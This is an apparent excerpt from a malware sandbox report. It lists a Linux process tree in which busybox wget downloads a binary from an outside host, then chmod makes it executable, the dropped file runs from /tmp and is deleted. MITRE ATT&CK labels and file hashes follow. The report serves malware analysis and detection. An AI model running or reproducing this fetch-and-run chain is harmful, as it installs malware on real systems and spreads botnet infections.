/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵PID:996
-
-
/bin/chmodchmod 777 cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵
- File and Directory Permissions Modification
PID:997
-
-
/tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6./cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵
- Executes dropped EXE
PID:998
-
-
/bin/rmrm cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵PID:999
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97